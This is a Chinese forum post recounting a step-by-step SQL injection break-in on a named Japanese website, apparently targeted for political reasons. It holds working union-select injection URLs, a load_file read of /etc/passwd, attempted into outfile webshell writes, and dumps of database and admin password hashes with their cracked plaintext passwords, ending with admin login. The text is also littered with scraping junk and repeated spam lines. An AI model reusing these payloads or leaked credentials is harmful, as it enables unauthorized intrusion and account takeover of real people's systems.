原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

/ \, ]4 k2 E5 M" ?0x01. 检测 www.zuaa.jp 收集数据


7 B; k+ @2 G$ K" fwhatweb
& @! @2 k! q1 q7 b% c7 h! M0 X3 }* T
8 M8 P  v* u: _2 U
  q; _$ V( [* F1 W+ |. s利用NMAP扫描
( y0 ?) E/ o2 ?3 V" X: i
3 e; j+ H( e% i, ^中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! o4 N. L+ C& N5 g3 Y! M. {0 ]: N0x02.找注入点
1 M( |9 Q; @- J# {/ \+ ~# ?1 R找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


- V5 ]4 q( f/ a0 f  V4 t0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
& n9 e/ H# U; g  [1 \; {
+ b2 H) n) c; k, Q3 }' z5 \order by 28报错，order by 27正常

0x04.   union手动查询
6 N3 A; ]6 A% N( Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
6 m2 H; B" ^6 K' J  X' H  J6 p添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

1 F7 H, P) F6 L5 S1 F' t" Z0x05. info:
4 q7 v$ B1 [$ g0 D0 h6 Mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
; ?9 F+ _! {$ S+ @database:    openpne
version:      4.1.22
os:             portbld-freebsd5.4

0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
( {/ D7 g* D- K# x- ^, z) K5 Y7 Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+ g$ C7 U6 f8 ]6 Y  d, S; f
- Z8 y6 m& u' {通过工具转换
, x; I8 T1 R! O. R+ g1 u8 L
8 y) j& o, r4 L/ A7 A中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
  P) ~$ a) i4 V9 a1 H
, U$ B( K! @7 ~+ _2 c# z2 B! A0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
$ {  y4 Q4 B7 [* }( Z
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持


; \; }% D! o% ~5 a" h* d: r
/ g. j, m- F* Z4 ?0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
; V  I2 N' @" E
4 x5 j, w* @, \3 N& `% E0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
9 u2 t7 ]; B8 T8 E. A可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
* u. Z" U  S( E( e* z- Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
" j1 A6 ]' m; z% droot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
' S3 F2 U+ B! ]8 Azuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

' v& h& S2 Y* v- c
. s* b2 \$ b0 L% l7 s3 u0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
) t* E$ b) A( O9 B, p$ t

  _# R4 C) z. v! l. h0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
/ b- u! v8 `. ~* ]
表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
1 Y/ ^7 N2 ~2 l9 M$ N& z& I
' ]2 l+ A( F2 J- h1 S解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
# G/ i+ g+ a2 j6 j
+ R4 V0 i! X6 I) d' c中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 ]: i0 n2 D% H
3 C% _: g9 B9 z& a/ g0 u9 B0x13. 登录后台
) J" u% z/ \8 V  P# S7 Z( Y% f

. s; H. \* M' l  |, v' q
- B& D3 w9 Z2 m/ }; x0x14. 小结
* r% A, B! [' ~+ H: q利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
/ s/ T8 M( ~3 T感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
9 D* y1 o( G# ^, A5 n  }! Q------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
) r/ T4 N+ A1 c* S, n6 O/ u
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
" \5 n# T4 I+ B; ]

荒村狂客

哪个牛人 费的这劲 入侵的